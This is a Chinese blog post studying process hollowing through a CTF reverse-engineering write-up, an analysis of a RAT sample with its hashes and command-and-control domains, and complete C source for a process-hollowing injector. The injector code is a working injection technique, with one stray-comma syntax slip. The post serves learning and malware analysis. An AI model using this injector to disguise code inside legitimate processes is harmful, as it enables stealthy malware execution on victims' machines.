主頁 >  其他 > 傀儡行程學習

傀儡行程學習

2020-10-07 20:32:28 其他

0x00 前言

最近做了一道18年swpuctf的題,分析了一個病毒,正巧都用到了傀儡行程,就想著把傀儡行程學習一下,本文權當個人的學習總結了一些網上的文章,如有錯誤,還請路過的大佬斧正,

0x01 SWPUCTF -- GAME

進入main函式

先獲取當前目錄,再拼上GAME.EXE

進入sub_4011D0

首先尋找資源,做準備作業,進入sub_4012C0

1)檢測PE結構

2) CreateProcessA 創建行程

3)GetThreadContext 得到行程背景關系資訊,用于下文計算基地址

4)sub_4016F0

到ntdll.dll里找到NtUnmapViewOfSection函式

5)VirtualAllocEx 跨行程,在目標行程申請空間

6)寫入檔案

7)SetThreadContext 恢復現場

8) 運行傀儡行程

我們來找找注入的程式

把GAME.EXE載入到010editor里,搜索"MZ"

dump出來,就是剛剛注入到傀儡行程的程式了,

我們把它命名為 game2.exe

載到IDA里分析

發現是D3D繪制

之后的解題與本文關系不大,這里直接把官方的WP搬運來了https://www.anquanke.com/post/id/168338#h3-16

通過字串[Enter]可以跟蹤到獲取輸入以及回傳上一層的地

這里用了’ – ’符來分割string,然后保存到vector中,并且判斷vector中string的個數是否是4以及每一個string的長度是否是4

接著傳入前面兩部分進行一次加密,可以根據常量識別出這是DES演算法,這里把DES的subkeys進行了一次移位,并且修改了sbox3開頭的5個位元組,然后把結尾結果減去0x10,之后再進行一個簡單的方程check,解方程可以得到另外兩部分是個常量,

DES部分可以網上找個標準的DES把這幾部分改一下就能解出FLAG:HOPE-UCAN-GOOD-GAME

小結

本題的sub_4012C0,就是在進行傀儡行程的撰寫,有必要仔細的說說傀儡行程

0x02 傀儡行程

文章: https://blog.csdn.net/darcy_123/article/details/102532411

首先使用CreateProcess傳入CREATE_SUSPENDED

創建一個掛起的行程,以下稱為傀儡行程,然后使用GetThreadContext讀取傀儡行程的背景關系資訊,通過DWORD

指標指向CONTEXT的EBX,DWORD + 8 位元組可以讀取到傀儡行程的基地址,然后計算傀儡行程的鏡像大小

然后把自己的資料讀入到傀儡行程內,設定CONTEXT背景關系入口點資訊EAX,并恢復行程主執行緒

上文已經寫得很詳細了,個人覺得重要的點

1)在CreateProcess時,注意環境問題 lpCurrentDirectory

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

2) 計算基地址

context.Ebx + 8 = 基地址,因此從context.Ebx + 8的地址讀取4位元組的內容并轉化為DWORD型別,即是行程加載的基地址,

3) VirtualAllocEx時的權限問題

4)VirtualAllocEx重定位的問題

一般情況下,在寫入傀儡行程對應的檔案按照申請空間的首地址作為基地址進行“重定位”,這樣才能保證傀儡行程的正常運行,為了避免這一步操作,可以以傀儡行程PE檔案頭部的建議加載基地址作為VirtualAllocEx的lpAddress引數,申請與之對應的記憶體空間,然后以此地址作為基地址將傀儡行程寫入目標程式,就不會存在重定位問題,關于“重定位”的原理可以自行網路查找相關資料

我們來看看實際上病毒用到的傀儡行程

0x03 病毒分析

1.virusTotal

https://www.virustotal.com/gui/file/32db88982a0d0f92804c4c53ffd8555935871e23b35a9d362e037353cb6b44c5/details

MD5 ba46b18f05ab2b24df26e343dd32946b
SHA-1 34f07e131d4f147af96d262eee761582c6f0b1a4
SHA-256 32db88982a0d0f92804c4c53ffd8555935871e23b35a9d362e037353cb6b44c5
Vhash bf09954b6ff12217cd0df0f93c7488e4
SSDEEP 24576:yij8jlUoiuFhypnWmUOJ4H0zMY/lspoBbRzRrT9MUF5jawb:yDhUoMFUcvo6FlrT2wb
File type RAR
Magic RAR archive data, v1d, os: Win32
File size 893.13 KB (914570 bytes)

環境win7 x64

是一個.rar檔案

在虛擬機里改后綴為.rar

解壓:

可以簡單的發現一個偽裝成檔案夾的.exe

2.對18XXXXXXXXXXXX.exe分析

查殼

沒有

然后GUI,有界面的程式

用LoadPE去看一下區段,資源等資訊

看一下重定位

和資源

關注一下匯入表

    0x0311       "WriteFile"
    0x0038       "CreateFileA"
    0x005F       "DeleteFileA"
    0x0240       "ReadFile"
    0x0128       "GetFileSize"
    0x020D       "OpenFile"
    0x0298       "SetFilePointer"
    0x0048       "CreateProcessA
    0x002B       "CopyFileA"
    0x00CC       "GetACP"

可能會新建新的檔案

IDA詳細分析

先搜字串

pavfnsvr.exe

sfctlcom.exe

后來看別人的分析,這兩個檔案是安全程式

IDA開始分析

開始時,一些準備作業,之后檢測版本號

申請堆,

釋放后,把申請的堆的句柄,放到40E968的位置

呼叫4057AE

檢測檔案的PE結構

主要是檢測PE結構,然后驗證目錄項要比14項多

之后回到start函式 sub_40624F

檢測的就是下圖紅框圈出來的那兩個

之后:

與SEH的高級使用有關

通過GetCommandLineA獲取當前檔案的路徑

"C:\Users\Administrator\Desktop\bingdu\1\bingdu\1\18xxxxxxxxxxxxxxxxxxxxxxxxxxxxx.EXE" 的地址存到了410268(00271F50)

sub_408D2C函式獲取環境資訊

獲取"ALLUSERSPROFILE=C:\ProgramData",

在將寬字符轉成多位元組

之后進入

V13為0x271fa6 ..(\洳..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.;的指標

V6為10

進入函式:

首先會獲取當前行程已加載模塊的檔案的完整路徑

然后加載到緩沖區

把當前的目錄傳入402120

進入402120

會呼叫兩次401450

看一下401450

rep stosd:

在網上查了相關資料顯示:

/************************************************************/

lea edi,[ebp-0C0h]

mov ecx,30h

mov eax,0CCCCCCCCh

rep stos dword ptr es:[edi]

rep指令的目的是重復其上面的指令.ECX的值是重復的次數.

STOS指令的作用是將eax中的值拷貝到ES:EDI指向的地址.

首先獲取當前的路徑

打開檔案讀取

獲取windows的目錄

在源目錄生成.bak檔案

生成檔案夾

把檔案備份到"C:\Windows\Help\18xxxxxxxxxxxxxxxxxxxxxxxxxxxxx.bak"

在把原來的.bak洗掉

進入402680

首先找到生成的空檔案夾

在記憶體里讀取檔案 1.jpg

將1.jpg和.archd作為引數進入4046A0

拼出路徑

將j.jpg換成1.liz

按照路徑寫入檔案,再將1.liz換成1.jpg

回圈7次生成7張圖片

第8次,生成Thumbs.db檔案

之后把C:/Windows/Help里的備份洗掉

進入第二個401450

先找到程式獲取臨時目錄檔案路徑

然后拼出路徑

"C:\Users\ADMINI~1\AppData\Local\Temp\\rat.EXE"

如果存在直接打開,不存在就創建

之后createprocess

創建行程,運行rat.EXE

先拼出來byeyou.tmp的路徑

之后 遍歷所有行程,保證沒有sftlcom.exe與pavfnsur.exe

把原檔案(18XXXX.EXE)移動到byeyou.tmp

分析 rat.exe

沒有殼

自啟動(嫖的圖)

注冊表相關(嫖的圖)

去找ctfmon.exe的目錄

拼路徑 將rat.exe copy成ctfmon.exe

之后尋找資源

拼出"C:\Windows\system32\alg.exe"

作為引數扔到sub_4016D0運行

進入傀儡行程函式

創建掛起行程 && 保存現場,收集資訊

之后像上述ctf一樣找到注入到傀儡行程的.exe

Dump出來起名為abc.def

分析 abc.def

看一下字串

進入WinMain函式

首先進入sub_405BD0

先解密字串從advapt32.dl,呼叫需要的函式

提權

之后進入 sub_401720解密接下來需要的字串

回到WinMain

從KERNEL32.DLL找需要的函式

之后進入sub_405960

進入遠控函式

首先登入一個網站

保存回傳的資料

之后就沒辦法動調了

把回傳的資料按照自己定義的字符切割

進入405DB0函式,依舊是解密

接著分配套介面,連上

進入403190

開始從.Dll里提取需要的函式

1.

2.

3.

4.

5&6

之后傳入域名引數

獲得本機的ip

能不能ping得通

檢測系統版本

CPU資訊

作業系統版本

獲取磁盤資訊

對檔案操作

創建,讀

洗掉,重命名

移動

復制

列出行程 &&殺死行程

卸載

關機重啟

截屏

接著還會在傳入其他的兩個域名

cn.fetftp.nu "rt.softseek.org"

進入403190控制函式

0x04 代碼實作

https://blog.csdn.net/superchickenchicken/article/details/102552787?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-6.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-6.nonecase

稍微修改了點去做別的用了

#include<stdio.h>
#include<windows.h>
#include<winbase.h>
struct _PROCESS_INFORMATION ProcessInfomation;


int main()
{
	LPVOID pAlloc1;
	LPVOID pAlloc2;
	HANDLE hfile;
	PIMAGE_NT_HEADERS pPeHeader;
	PIMAGE_SECTION_HEADER pSectionHeader;
	int lastError, ReadInfo = 0;
	DWORD BytesRead = 0;
	CONTEXT Context = { 0 };
	Context.ContextFlags = CONTEXT_ALL;
	char lpName[260];
	//準備路徑
	char Patch[] = "C:\\play.exe";//注入傀儡行程的.exe的路徑
	LPCSTR p = (const char*)Patch;
	//轉移檔案


	//以掛起的方式創建傀儡行程,并獲取行程基址
	STARTUPINFOA StartupInfo = { 0 };
	PROCESS_INFORMATION ProcessInfomation = { 0 };
	StartupInfo.cb = sizeof(StartupInfo);

	GetModuleFileName(0, lpName, 520);
	if (!CreateProcess(lpName, NULL, 0, 0, 0, CREATE_SUSPENDED, 0, 0, &StartupInfo, &ProcessInfomation)),
	{
		lastError = GetLastError();
		printf("CreateProcess fail  LastError:%d\n", lastError);
	};

	if (!GetThreadContext(ProcessInfomation.hThread, &Context))
	{
		lastError = GetLastError();
		printf("GetThreadContext fail LastError:%d\n", lastError);
	};

	if (!ReadProcessMemory(ProcessInfomation.hProcess, (LPCVOID)(Context.Ebx + 0x8), &ReadInfo, 4, 0))
	{
		lastError = GetLastError();
		printf("GetProcessImageBase fail LastError:%d\n", lastError);
		//printf("%d\n", dwIO);
	};
	printf("ProcessImageBase:address 0x%x\n", ReadInfo);

	
	// 把準備注入到傀儡行程的程式讀進記憶體
	hfile = CreateFileA(p, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
	//lastError = GetLastError();
	//printf("%d\n", lastError);

	pAlloc1 = VirtualAlloc(NULL, 0x70000, 0x3000, 4);//sucessful
	//printf("%d", pAlloc1);
	ReadFile(hfile, pAlloc1, 0x70000, &BytesRead, 0);

	pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pAlloc1 + ((PIMAGE_DOS_HEADER)pAlloc1)->e_lfanew);//sucessful
	//printf("%d", pPeHeader);
	pSectionHeader = (IMAGE_SECTION_HEADER*)((char*)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);//sucessful
	//printf("%d", pSectionHeader);
	//向傀儡行程申請記憶體空間
	SetLastError(0);
	pAlloc2 = VirtualAllocEx(ProcessInfomation.hProcess, (LPVOID)pPeHeader->OptionalHeader.ImageBase, pPeHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, 64);
	//printf("%d\n", pAlloc2);
	if (!pAlloc2)
	{
		lastError = GetLastError();
		printf("VirtualAllocEx fail LastError:%d\n", lastError);
		TerminateProcess(ProcessInfomation.hProcess, 0);
		return 0;

	}
	printf("AllocExBase: %x\n", pAlloc2);

	//寫入PE頭
	if (WriteProcessMemory(ProcessInfomation.hProcess, pAlloc2, pAlloc1, pPeHeader->OptionalHeader.SizeOfHeaders, 0))
	{
		printf("write PeHeader Success !\n");
	}


	//寫入節表,分節表寫入會使得程式展開在行程中
	int NumofSection = pPeHeader->FileHeader.NumberOfSections;
	for (int i = 0;i < NumofSection;i++)
	{
		LPVOID pAllocRawAddressSection = (char*)pAlloc1 + pSectionHeader->PointerToRawData;
		LPVOID pAllocVirtualAddressSection = (char*)pPeHeader->OptionalHeader.ImageBase + pSectionHeader->VirtualAddress;
		if (WriteProcessMemory(ProcessInfomation.hProcess, pAllocVirtualAddressSection, pAllocRawAddressSection, pSectionHeader->SizeOfRawData, 0))
		{
			printf("write the %d section success !\n", i + 1);
		}
		else
		{
			lastError = GetLastError();
			printf("write the %d section fail ! lastError:%d\n", i + 1, lastError);
		}
		pSectionHeader++;
	}

	//設定傀儡行程的行程基址0x400000
	if (WriteProcessMemory(ProcessInfomation.hProcess, (char*)Context.Ebx + 8, &pPeHeader->OptionalHeader.ImageBase, 4, 0))
	{
		printf("set Process ImageBase is 0x400000  success !\n");
	}

	//設定傀儡行程的行程OEP 為注入程式的OEP
	Context.Eax = pPeHeader->OptionalHeader.ImageBase + pPeHeader->OptionalHeader.AddressOfEntryPoint;//設定入口點地址 一定別忘了加基址

	if (SetThreadContext(ProcessInfomation.hThread, &Context))
	{
		printf("set Thread Context success !\n");
	}

	//恢復執行緒運行

	if (ResumeThread(ProcessInfomation.hThread) != (DWORD)-1)
	{
		lastError = GetLastError();
		printf("Resume Thread success ! \n");
	}


	system("pause");
	return 0;
}

0x04總結

emmmm不知道說啥,溜了

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/161827.html

標籤:其他

上一篇:做一個電商網站我們應該注意哪些問題?

下一篇:網路資訊安全(二)——ARP攻擊實驗演示(如何優雅切斷別人網路)

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more